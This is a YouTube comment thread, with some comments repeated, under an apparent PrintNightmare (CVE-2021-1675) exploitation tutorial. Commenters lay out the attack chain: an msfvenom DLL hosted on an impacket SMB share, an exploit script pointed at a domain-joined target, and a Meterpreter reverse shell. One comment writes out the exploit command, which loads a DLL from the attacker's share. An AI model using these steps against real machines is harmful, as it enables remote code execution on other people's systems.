i still don't understand this. does printnightmare only happens to shared printers (e. g. USB) but not to printers on a switch? since printnightmare, all the patches we had installed didn't allow us to access our shared printer (connected to main pc with USB). the main pc is connected to a big LAN. now we bought a nice 8-port switch and connected lots of devices to it and the best part now: every pc can access the printer now perfectly. in the beginning, using the shared printer was only possible by downloading the driver from the main pc. since the printer is connected to the switch, the driver has to be downloaded from the hp-website.
Hey there... Was revising this.. Hi there... Unable to figure out the need for this share drive that we set on the kali... We used msfvenom to create the payload.. Metasploit for listening the connection... Now our aim is to execute this payload on the remote workstation that has print spooler service is enabled... Why did we need the help of a share drive in our attacker workstation and use impacket to use the victim to execute that dll file via the share hosted on our machine ...if we had somehow managed to deliver that payload to the victim, i guess the share drive n impacket step is not needed... Please enlighten me
We need the SMB Share, So what we do is, Generate a malicious DLL using msfvenom, And then use the custom version of impacket used in the video, We need the SMBServer.py as it is going to host our malicious DLL, The exploit will get the Malicious DLL on the system by the SMB Share which we hosted, Once it is on the system, The DLL will be injected into the memory, And all of this is happening due to the vulnerability, PrintSpooler had an authentication bug in it, Due to which any one could install print drivers, As an attacker, We can take advantage of it and put a malicious DLL on the target system.
@@ActiveXSploit thanks man.. So i understand this... - msfvenom: payload creation - impacket smbshare: create a share drive on local machine to host the malicious dll. - impacket cve module: to force the Victim to execute the DLL which becomes possible due to auth bypass bug. - metasploit: get a reverse shell once the dll is executed
@@ian230187 We are using impacket to set up a smbshare, impacket is the name of the scripts, Don't get confused by it, There is a impacket script called smbserver which we used to setup an SMB Share which is going to server our malicious DLL. The one which delivers the DLL over there and executes it, Is the exploit
Just a quick query....this exploit can be used to target normal workstations as well and not necessarily domain controllers...Its just that the machine needs to be part of the domain...Am i right?
@@ActiveXSploit thanks man ..n great job... One request ...at the end of video...if you could quickly add a slide about the steps n a one liner explanation about the command significance it would be super awesome
Hello there its a great video and explains everything in great detail. I'm quite new to using metasploit or not really I just can't wrap my head around it. So when I connect to the windows machine how do I actually navigate it, can I just use normal windows commands? So if I would for example want to just make a new file I would just type into the msfconsole "md %random%" for example if I wanted to make a random empty file
You can switch to the shell mode by typing the command 'shell' when you get a meterpreter connection, and you can just run standard windows commands such as cd, mkdir, rmdir, and so on, But you can also do this in a meterpreter session, just type out help to list out available commands in a meterpreter session
@@Hatarpotatissmaskare Glad to hear that! There are good videos on usage of metasploit on UA-cam, just search them up and you should get some good resources!
@@ActiveXSploit yes thank you I'll go see. I've checked out some videos before but all I've really found is basics and how to create a reverse tcp shell. Otherwise it doesn't really go in depth about metasploit. Found one which is very good tho
@@ActiveXSploit i just can't seem to get it to work so at the end to establish the connection you do python3 ./CVE-2021-1675.py then what is it I put here/username:"password"@ip adress of target machine '\\my ip adress\share\shell.dll' Did I get all that correct? Except for my question on what to put before the username
Vulnerbility that Rocked the World "PrintNightMare" .... You Did It great !!!
i still don't understand this. does printnightmare only happens to shared printers (e. g. USB) but not to printers on a switch? since printnightmare, all the patches we had installed didn't allow us to access our shared printer (connected to main pc with USB). the main pc is connected to a big LAN. now we bought a nice 8-port switch and connected lots of devices to it and the best part now: every pc can access the printer now perfectly.
in the beginning, using the shared printer was only possible by downloading the driver from the main pc. since the printer is connected to the switch, the driver has to be downloaded from the hp-website.
Nice buddy. You did great ! 🤟
Hmm the final command to run the exploit seems to give me a connection failed error code. Any idea on how to solve it?
Nice effort.. dude. Keep going!
Thank you!
Hey there...
Was revising this..
Hi there...
Unable to figure out the need for this share drive that we set on the kali...
We used msfvenom to create the payload..
Metasploit for listening the connection...
Now our aim is to execute this payload on the remote workstation that has print spooler service is enabled...
Why did we need the help of a share drive in our attacker workstation and use impacket to use the victim to execute that dll file via the share hosted on our machine ...if we had somehow managed to deliver that payload to the victim, i guess the share drive n impacket step is not needed...
Please enlighten me
We need the SMB Share, So what we do is, Generate a malicious DLL using msfvenom, And then use the custom version of impacket used in the video, We need the SMBServer.py as it is going to host our malicious DLL, The exploit will get the Malicious DLL on the system by the SMB Share which we hosted, Once it is on the system, The DLL will be injected into the memory, And all of this is happening due to the vulnerability, PrintSpooler had an authentication bug in it, Due to which any one could install print drivers, As an attacker, We can take advantage of it and put a malicious DLL on the target system.
@@ActiveXSploit thanks man..
So i understand this...
- msfvenom: payload creation
- impacket smbshare: create a share drive on local machine to host the malicious dll.
- impacket cve module: to force the Victim to execute the DLL which becomes possible due to auth bypass bug.
- metasploit: get a reverse shell once the dll is executed
@@ian230187 We are using impacket to set up a smbshare, impacket is the name of the scripts, Don't get confused by it, There is a impacket script called smbserver which we used to setup an SMB Share which is going to server our malicious DLL. The one which delivers the DLL over there and executes it, Is the exploit
@@ActiveXSploit ohh ya..my typo...
Impacket modules of smbshare and the cve..
Thanks
Just a quick query....this exploit can be used to target normal workstations as well and not necessarily domain controllers...Its just that the machine needs to be part of the domain...Am i right?
Yes, You are right, This is an AD based attack, The machine should be a part of the domain
@@ActiveXSploit thanks man ..n great job... One request ...at the end of video...if you could quickly add a slide about the steps n a one liner explanation about the command significance it would be super awesome
@@ian230187 Glad you liked it! Alright! Im gonna keep that in mind!
This is the best video ever
Hello there its a great video and explains everything in great detail. I'm quite new to using metasploit or not really I just can't wrap my head around it. So when I connect to the windows machine how do I actually navigate it, can I just use normal windows commands? So if I would for example want to just make a new file I would just type into the msfconsole "md %random%" for example if I wanted to make a random empty file
You can switch to the shell mode by typing the command 'shell' when you get a meterpreter connection, and you can just run standard windows commands such as cd, mkdir, rmdir, and so on, But you can also do this in a meterpreter session, just type out help to list out available commands in a meterpreter session
@@ActiveXSploit alright thank you very much! You've been so helpful and make great videos
@@Hatarpotatissmaskare Glad to hear that! There are good videos on usage of metasploit on UA-cam, just search them up and you should get some good resources!
@@ActiveXSploit yes thank you I'll go see. I've checked out some videos before but all I've really found is basics and how to create a reverse tcp shell. Otherwise it doesn't really go in depth about metasploit. Found one which is very good tho
@@ActiveXSploit i just can't seem to get it to work so at the end to establish the connection you do python3 ./CVE-2021-1675.py then what is it I put here/username:"password"@ip adress of target machine '\\my ip adress\share\shell.dll'
Did I get all that correct? Except for my question on what to put before the username
GREAT!!!!
Do you know how to use SMBv2 instead of v3 when setting up the server with impacket? Thanks!
Please add the -smb2support flag
I have tried the same but at the last stage what name, password and IP should be used? Because of this, I am stuck here and unable to proceed further
Hi did you manage to solve this ? Im also trying this out but stuck here😢
Hi did you manage to solve this? I am trying this out and stuck here too😢
Great
better to make a venv to have the custom impacket
Nice video. Tried that but defender is a bitch.
Haha, Defender is getting better everyday!
Noice
Give me the link window 2016 vuln sir !
Do check description of the video please.
Can you give me the link how to download window 2016 vulnerable.
@@sarunkim6096 What do you mean? Vulnerable version of Windows Server 2016?
Yes I want to test it .
@@ActiveXSploit I have download window 2016 from Microsoft but does not vulnerable.